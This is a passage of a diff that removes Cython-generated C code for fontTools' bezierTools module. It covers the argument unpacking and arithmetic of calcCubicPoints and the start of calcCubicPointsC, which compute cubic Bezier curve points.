__Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - __pyx_v_d = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicPoints", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 994, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicPoints", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_56calcCubicPoints(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_d); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_56calcCubicPoints(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d) { - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_dx = NULL; - PyObject *__pyx_v_dy = NULL; - PyObject *__pyx_v_x1 = NULL; - PyObject *__pyx_v_y1 = NULL; - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_v_y2 = NULL; - PyObject *__pyx_v_x3 = NULL; - PyObject *__pyx_v_y3 = NULL; - PyObject *__pyx_v_x4 = NULL; - PyObject *__pyx_v_y4 = NULL; - PyObject *__pyx_r = NULL; - 
__Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicPoints", 1); - - /* "fontTools/misc/bezierTools.py":995 - * - * def calcCubicPoints(a, b, c, d): - * ax, ay = a # <<<<<<<<<<<<<< - * bx, by = b - * cx, cy = c - */ - if ((likely(PyTuple_CheckExact(__pyx_v_a))) || (PyList_CheckExact(__pyx_v_a))) { - PyObject* sequence = __pyx_v_a; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 995, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 995, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 995, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 995, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if 
(__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 995, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 995, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_ax = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_ay = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":996 - * def calcCubicPoints(a, b, c, d): - * ax, ay = a - * bx, by = b # <<<<<<<<<<<<<< - * cx, cy = c - * dx, dy = d - */ - if ((likely(PyTuple_CheckExact(__pyx_v_b))) || (PyList_CheckExact(__pyx_v_b))) { - PyObject* sequence = __pyx_v_b; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 996, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 996, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 996, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_b); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 996, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - 
__Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 996, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 996, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_bx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_by = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":997 - * ax, ay = a - * bx, by = b - * cx, cy = c # <<<<<<<<<<<<<< - * dx, dy = d - * x1 = dx - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 997, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 997, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 997, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 997, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = 
__Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 997, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 997, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_cy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":998 - * bx, by = b - * cx, cy = c - * dx, dy = d # <<<<<<<<<<<<<< - * x1 = dx - * y1 = dy - */ - if ((likely(PyTuple_CheckExact(__pyx_v_d))) || (PyList_CheckExact(__pyx_v_d))) { - PyObject* sequence = __pyx_v_d; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 998, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 998, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 998, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = 
PyObject_GetIter(__pyx_v_d); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 998, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 998, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 998, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_dx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_dy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":999 - * cx, cy = c - * dx, dy = d - * x1 = dx # <<<<<<<<<<<<<< - * y1 = dy - * x2 = (cx / 3.0) + dx - */ - __Pyx_INCREF(__pyx_v_dx); - __pyx_v_x1 = __pyx_v_dx; - - /* "fontTools/misc/bezierTools.py":1000 - * dx, dy = d - * x1 = dx - * y1 = dy # <<<<<<<<<<<<<< - * x2 = (cx / 3.0) + dx - * y2 = (cy / 3.0) + dy - */ - __Pyx_INCREF(__pyx_v_dy); - __pyx_v_y1 = __pyx_v_dy; - - /* "fontTools/misc/bezierTools.py":1001 - * x1 = dx - * y1 = dy - * x2 = (cx / 3.0) + dx # <<<<<<<<<<<<<< - * y2 = (cy / 3.0) + dy - * x3 = (bx + cx) / 3.0 + x2 - */ - __pyx_t_1 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_cx, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1001, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_dx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1001, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_x2 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1002 - * y1 = dy - * x2 = (cx / 3.0) 
+ dx - * y2 = (cy / 3.0) + dy # <<<<<<<<<<<<<< - * x3 = (bx + cx) / 3.0 + x2 - * y3 = (by + cy) / 3.0 + y2 - */ - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_cy, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1002, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_dy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1002, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1003 - * x2 = (cx / 3.0) + dx - * y2 = (cy / 3.0) + dy - * x3 = (bx + cx) / 3.0 + x2 # <<<<<<<<<<<<<< - * y3 = (by + cy) / 3.0 + y2 - * x4 = ax + dx + cx + bx - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_bx, __pyx_v_cx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1003, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1003, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_x2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1003, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1004 - * y2 = (cy / 3.0) + dy - * x3 = (bx + cx) / 3.0 + x2 - * y3 = (by + cy) / 3.0 + y2 # <<<<<<<<<<<<<< - * x4 = ax + dx + cx + bx - * y4 = ay + dy + cy + by - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_by, __pyx_v_cy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1004, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1004, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_y2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1004, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - 
__Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1005 - * x3 = (bx + cx) / 3.0 + x2 - * y3 = (by + cy) / 3.0 + y2 - * x4 = ax + dx + cx + bx # <<<<<<<<<<<<<< - * y4 = ay + dy + cy + by - * return (x1, y1), (x2, y2), (x3, y3), (x4, y4) - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_ax, __pyx_v_dx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1005, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1005, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1005, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x4 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1006 - * y3 = (by + cy) / 3.0 + y2 - * x4 = ax + dx + cx + bx - * y4 = ay + dy + cy + by # <<<<<<<<<<<<<< - * return (x1, y1), (x2, y2), (x3, y3), (x4, y4) - * - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_ay, __pyx_v_dy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1006, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1006, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_by); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1006, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y4 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1007 - * x4 = ax + dx + cx + bx - * y4 = ay + dy + cy + by - * return (x1, y1), (x2, y2), (x3, y3), (x4, y4) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if 
(__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x1)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y1); - __Pyx_GIVEREF(__pyx_v_y1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y1)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_x2)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y2); - __Pyx_GIVEREF(__pyx_v_y2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_y2)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x3); - __Pyx_GIVEREF(__pyx_v_x3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x3)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y3); - __Pyx_GIVEREF(__pyx_v_y3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_y3)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_x4); - __Pyx_GIVEREF(__pyx_v_x4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_x4)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y4); - __Pyx_GIVEREF(__pyx_v_y4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_v_y4)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_1)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_2)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_t_3)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_5); - if 
(__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_t_5)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_5 = 0; - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":994 - * - * - * def calcCubicPoints(a, b, c, d): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicPoints", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_dx); - __Pyx_XDECREF(__pyx_v_dy); - __Pyx_XDECREF(__pyx_v_x1); - __Pyx_XDECREF(__pyx_v_y1); - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_y2); - __Pyx_XDECREF(__pyx_v_x3); - __Pyx_XDECREF(__pyx_v_y3); - __Pyx_XDECREF(__pyx_v_x4); - __Pyx_XDECREF(__pyx_v_y4); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1010 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.locals( - */ - -static CYTHON_INLINE PyObject *__pyx_f_9fontTools_4misc_11bezierTools_calcCubicPointsC(__pyx_t_double_complex __pyx_v_a, __pyx_t_double_complex __pyx_v_b, __pyx_t_double_complex __pyx_v_c, __pyx_t_double_complex __pyx_v_d) { - __pyx_t_double_complex __pyx_v_p2; - __pyx_t_double_complex __pyx_v_p3; - __pyx_t_double_complex __pyx_v_p4; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - 
__Pyx_RefNannySetupContext("calcCubicPointsC", 1); - - /* "fontTools/misc/bezierTools.py":1022 - * ) - * def calcCubicPointsC(a, b, c, d): - * p2 = c * (1 / 3) + d # <<<<<<<<<<<<<< - * p3 = (b + c) * (1 / 3) + p2 - * p4 = a + b + c + d - */ - __pyx_v_p2 = __Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_v_c, __pyx_t_double_complex_from_parts((1.0 / 3.0), 0)), __pyx_v_d); - - /* "fontTools/misc/bezierTools.py":1023 - * def calcCubicPointsC(a, b, c, d): - * p2 = c * (1 / 3) + d - * p3 = (b + c) * (1 / 3) + p2 # <<<<<<<<<<<<<< - * p4 = a + b + c + d - * return (d, p2, p3, p4) - */ - __pyx_v_p3 = __Pyx_c_sum_double(__Pyx_c_prod_double(__Pyx_c_sum_double(__pyx_v_b, __pyx_v_c), __pyx_t_double_complex_from_parts((1.0 / 3.0), 0)), __pyx_v_p2); - - /* "fontTools/misc/bezierTools.py":1024 - * p2 = c * (1 / 3) + d - * p3 = (b + c) * (1 / 3) + p2 - * p4 = a + b + c + d # <<<<<<<<<<<<<< - * return (d, p2, p3, p4) - * - */ - __pyx_v_p4 = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__pyx_v_a, __pyx_v_b), __pyx_v_c), __pyx_v_d); - - /* "fontTools/misc/bezierTools.py":1025 - * p3 = (b + c) * (1 / 3) + p2 - * p4 = a + b + c + d - * return (d, p2, p3, p4) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_PyComplex_FromComplex(__pyx_v_d); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1025, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_v_p2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1025, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_v_p3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1025, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_p4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1025, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1025, __pyx_L1_error) - 